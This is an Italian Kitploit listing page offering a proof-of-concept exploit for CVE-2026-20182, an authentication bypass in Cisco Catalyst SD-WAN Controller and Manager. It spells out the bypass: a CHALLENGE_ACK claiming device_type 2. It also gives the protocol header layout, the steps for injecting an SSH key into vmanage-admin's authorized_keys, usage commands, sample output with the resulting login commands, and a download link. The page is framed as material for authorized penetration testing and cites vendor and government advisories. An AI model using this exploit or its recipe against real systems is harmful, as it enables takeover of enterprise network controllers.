Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-20182 — CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager Authentication Bypass (CVSS 10.0) | Kitploit
Strumenti/GitHubGitHub/portbuster1337/cve-2026-20182
Framework di ExploitAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingSicurezza CloudAutenticazioneRed Teaming
GitHubportbuster1337/cve-2026-20182

CVE-2026-20182

CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager Authentication Bypass (CVSS 10.0)

Vedi Repository
333 mesi faNon ancora revisionato
Sito web

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-20182 — Cisco Catalyst SD-WAN Controller / Manager Bypass di Autenticazione

Un proof-of-concept di exploit per CVE-2026-20182, un bypass critico (CVSS 10.0) dell'autenticazione nel servizio vdaemon DTLS (UDP/12346) su Cisco Catalyst SD-WAN Controller (vSmart) e Manager (vManage).

Divulgato: 14 maggio 2026 da Rapid7 (Stephen Fewer & Jonah Burgess)
CISA KEV: Aggiunto il 14 maggio 2026 (Direttiva d'Emergenza 26-03)
CVSS: 10.0 — CWE-287: Autenticazione Impropria

Vulnerabilità

Il servizio vdaemon utilizza un handshake DTLS multifase per autenticare i peer del piano di controllo. La funzione vbond_proc_challenge_ack() implementa la verifica del certificato specifica per tipo di dispositivo — ma il tipo di dispositivo 2 (vHub) non ha alcun percorso di verifica. L'invio di un CHALLENGE_ACK con device_type=2 fa sì che la funzione passi attraverso ogni condizionale e imposti incondizionatamente peer->authenticated = 1.

Non sono richieste credenziali valide, né certificato firmato da CA, né conoscenza della distribuzione SD-WAN.

Cosa Fa l'Exploit

  1. Stabilisce una connessione DTLS 1.2 al servizio vdaemon del target (UDP/12346)
  2. Riceve il messaggio CHALLENGE (msg_type=8)
  3. Invia CHALLENGE_ACK dichiarando di essere un vHub (device_type=2) → il peer viene marcato come autenticato
  4. Invia HELLO (msg_type=5) → il peer passa allo stato UP
  5. Inietta una chiave pubblica SSH in /home/vmanage-admin/.ssh/authorized_keys tramite MSG_VMANAGE_TO_PEER (msg_type=14)
  6. Concede accesso NETCONF (SSH TCP/830) o accesso SSH (TCP/22) come vmanage-admin

Utilizzo

root@kitploit:~
python3 cve-2026-20182.py -t <target> [options]

Opzioni

ArgomentoDescrizione
-t, --targetIP o hostname del target
--portPorta UDP vdaemon (default: 12346)
--key-filePercorso di una chiave pubblica SSH esistente da iniettare (opzionale)
--netconfVerifica lo sfruttamento connettendosi a NETCONF via SSH

Esempi

root@kitploit:~
# Genera una nuova coppia di chiavi e sfrutta
python3 cve-2026-20182.py -t 192.168.1.100

# Usa una chiave pubblica esistente
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub

# Sfrutta e verifica via NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf

Output

root@kitploit:~
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...

[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH:     ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]

Versioni Affette

ReleaseVersione Corretta
< 20.9Migrare a una release supportata
20.920.9.9.1
20.1020.12.7.1
20.1120.12.7.1
20.1220.12.5.4 / 20.12.6.2 / 20.12.7.1
20.1320.15.5.2
20.1420.15.5.2
20.1520.15.4.4 / 20.15.5.2
20.1620.18.2.2
20.1820.18.2.2
26.1.126.1.1.1

Riferimenti di Ricerca

  • Rapid7 (Divulgazione Originale): CVE-2026-20182: Critical authentication bypass in Cisco Catalyst SD-WAN Controller — Analisi tecnica completa, codice decompilato e dettagli del protocollo di Stephen Fewer & Jonah Burgess
  • Avviso di Sicurezza Cisco: cisco-sa-sdwan-rpa2-v69WY2SW — Avviso del fornitore con versioni corrette
  • CISA KEV: CVE-2026-20182 — Direttiva d'Emergenza 26-03 (riparazione entro il 17 maggio 2026)
  • NVD: CVE-2026-20182 — Voce del National Vulnerability Database
  • Modulo Metasploit di Rapid7: cisco_sdwan_vhub_auth_bypass — Modulo ausiliario nel framework Metasploit
  • BleepingComputer: Cisco warns of new critical SD-WAN flaw exploited in zero-day attacks
  • Tenable: FAQ about the continued exploitation of Cisco SD-WAN vulnerabilities
  • Cisco Talos: Attore di minaccia UAT-8616 attribuito allo sfruttamento di questa vulnerabilità in natura

Dettagli Tecnici

L'intestazione del protocollo vdaemon è di 12 byte:

OffsetDimensioneCampoNote
01msg_typeNibble basso = tipo, nibble alto = versione
11device_infoNibble alto = device_type, nibble basso = flags
21flagsValore standard 0xA0
31paddingSempre 0x00
4-74domain_iduint32 big-endian
8-114site_iduint32 big-endian

Tipi di dispositivo: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage

Requisiti

  • Python 3.7+
  • CLI openssl (per trasporto DTLS)
  • Libreria cryptography (pip install cryptography)

Disclaimer

Questo exploit è destinato esclusivamente a operazioni autorizzate di red team, test di penetrazione e ricerca sulla sicurezza su sistemi per i quali si dispone di esplicita autorizzazione scritta. L'uso non autorizzato è illegale.

Scarica lo strumento